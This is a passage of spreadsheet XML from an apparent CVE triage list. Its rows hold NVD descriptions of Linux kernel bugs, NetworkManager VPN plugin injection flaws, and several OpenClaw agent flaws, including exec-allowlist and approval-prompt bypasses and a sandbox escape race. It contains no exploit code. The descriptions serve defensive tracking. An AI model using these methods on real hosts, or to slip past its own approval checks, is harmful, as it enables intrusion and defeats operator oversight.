writers - the connect, accept, teardown and swap paths - and what
serializes each of them.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98070</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98130</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr"/>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: fix a TOCTOU race in SCTP_CMD_TIMER_START
The SCTP_CMD_TIMER_START handler checks timer_pending() before calling
timer_reduce(). The timer can expire and detach between these operations,
causing timer_reduce() to rearm the timer without taking the association
reference required for the newly armed timer.
The timer callback later unconditionally drops its association reference,
which can leave the association reference count unbalanced and result in
use-after-free during association teardown.
Use the return value of timer_reduce() to determine whether the timer was
actually armed. Take the association reference only when timer_reduce()
successfully starts a new timer, closing the race between checking the
timer state and rearming it.
This issue was reported by Nico Yip (@_cyeaa_) working with TrendAI Zero
Day Initiative.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98130</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100559</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a command parser vulnerability where escaped newlines confuse exec allowlist parsing, allowing hidden commands to execute. Attackers can craft input with escaped newlines to bypass allowlist validation and execute additional commands without expected authorization prompts.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100559</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100561</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.3.22 and &lt; 2026.8.1 contain an approval-bypass flaw in the exec approval policy: the policy could trust a command-running wrapper without inspecting the command carried in its arguments. After an operator allowlisted or permanently approved a benign wrapper invocation, a later agent turn could substitute an arbitrary inner command and execute it with the OpenClaw process's host privileges without a further approval prompt. Exploitation requires the relevant wrapper to resolve on the host and a prior operator decision allowing that wrapper. Transparent shell carriers and opaque utilities such as process monitors, tracers, namespace tools, and proxy wrappers were affected through related trust-resolution gaps. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100561</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100585</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.7.1 fails to enforce the owner-only authorization requirement for Claude Code permission prompts delivered through the MCP channel bridge. An authorized non-owner channel sender with channel command access can approve or deny a pending permission request intended for the owner, causing the requested action to proceed without owner consent. The practical impact depends on the pending action and the host capabilities requested by the Claude Code run. The issue is fixed in version 2026.7.1.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100585</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100570</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>npm, python, rust</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.3.28 and &lt; 2026.8.1 allow an untrusted workspace .env file to set the CLOUDSDK_PYTHON_ARGS environment variable. When an operator starts OpenClaw in attacker-controlled workspace content and then runs the Gmail setup flow, that value is inherited when gcloud is launched, and the gcloud launcher passes it as arguments to the trusted Python interpreter. A crafted CLOUDSDK_PYTHON_ARGS value can therefore cause Python to execute attacker-supplied code with the OpenClaw host user's permissions, allowing credentials to be read, files to be modified, or other processes to be started. This issue is fixed in version 2026.8.1; as a workaround, run Gmail setup only from trusted workspaces and clear inherited CLOUDSDK_* variables beforehand.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100570</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100597</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 is vulnerable to a time-of-check time-of-use race condition in OpenShell local mirror filesystem mutation operations. The remove, mkdir, and rename operations could act on a different filesystem target after OpenClaw completed its sandbox path-safety check, if the path is changed concurrently. An attacker able to win the race can cause a sandboxed operation to delete, create, or rename a host path outside the intended mirror root with the permissions of the OpenClaw process user. This does not require an operator to have granted host filesystem access outside the sandbox. The issue is fixed in 2026.7.1.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100597</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79153</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>Seclore FileSecure Desktop Client before 3.25.1.0 contains improper access control vulnerability in the kernel-mode driver component that allows an authenticated local user to gain elevated privileges to NT AUTHORITY\SYSTEM on affected systems.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79153</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91837</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-iodine, the iodine VPN plugin for NetworkManager. A local unprivileged user can exploit a vulnerability in how the 'nameserver' setting is processed when establishing an iodine VPN connection. By embedding shell metacharacters (special characters that can execute commands) in the 'nameserver' value, an attacker can inject and execute arbitrary commands. These commands run with root privileges before the application drops its elevated permissions, leading to local privilege escalation.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91837</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91838</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-sstp, the SSTP VPN plugin for NetworkManager. A local unprivileged user can exploit this vulnerability by embedding special characters, known as shell metacharacters, into VPN connection profile fields such as CA certificate or proxy settings. These unescaped characters are then processed by the `pppd` daemon, which runs with root privileges, allowing the attacker to execute arbitrary commands with elevated permissions when a malicious VPN connection is activated.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91838</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91839</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-fortisslvpn, the FortiSSLVPN plugin for NetworkManager. The nm-fortisslvpn-service improperly handles carriage-return/line-feed (CR/LF) characters in VPN connection profile credentials. A local unprivileged user can exploit this by crafting a malicious VPN profile to inject additional configuration directives. This can lead to arbitrary code execution with root privileges when the crafted VPN connection is activated.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91839</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91840</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-vpnc. This vulnerability allows a local unprivileged user to escalate privileges to root. By injecting a newline character into the VPN username field, an attacker can manipulate the vpnc configuration to execute an arbitrary program with root privileges when the malicious VPN connection is activated.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91840</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91841</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-vpnc, a VPN plugin for NetworkManager. A local unprivileged user can exploit this vulnerability by injecting a newline character into the CA-File path. This manipulation allows the user to execute arbitrary commands as the root user, leading to local privilege escalation.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91841</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97548</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr"/>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: fix the rtrmap and rtrefcount _maxlevels_ondisk functions
The _maxlevels_ondisk functions are used to compute the size of
in-memory btree cursors for each btree type.  Unfortunately, LOLLM
noticed that the rtrmap and rtrefcount versions of these functions
forget to account for the inode root, which means that we could access
beyond the end of the cursor given a sufficiently large btree.  Fix
this.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97548</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97575</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr"/>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: v4l2-ctrls: validate AV1 tile counts
The stateless AV1 decoders use tile_info.tile_cols and tile_rows as loop
bounds and as indices into the mi_*_starts[] and *_in_sbs_minus_1[]
arrays, as the divisor for context_update_tile_id, and their product
bounds the per-tile descriptor buffers, but std_validate_compound() does
not bound these u8 fields. Reject a V4L2_CTRL_TYPE_AV1_FRAME whose
tile_cols or tile_rows exceeds V4L2_AV1_MAX_TILE_COLS / _ROWS, or whose
product exceeds V4L2_AV1_MAX_TILE_COUNT. A zero tile count is left to the
consuming driver so the zero-initialised control that existing userspace
submits is still accepted.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97575</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97576</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr"/>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: v4l2-ctrls: validate HEVC tile counts
The stateless HEVC decoders read num_tile_columns_minus1 + 1 entries from
column_width_minus1[] and num_tile_rows_minus1 + 1 from row_height_minus1[]
and use them as tile-loop bounds, but std_validate_compound() does not
bound these u8 counts. Reject a V4L2_CTRL_TYPE_HEVC_PPS with tiling
enabled whose tile counts exceed the uAPI array capacity, mirroring the
existing compound-control range checks.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
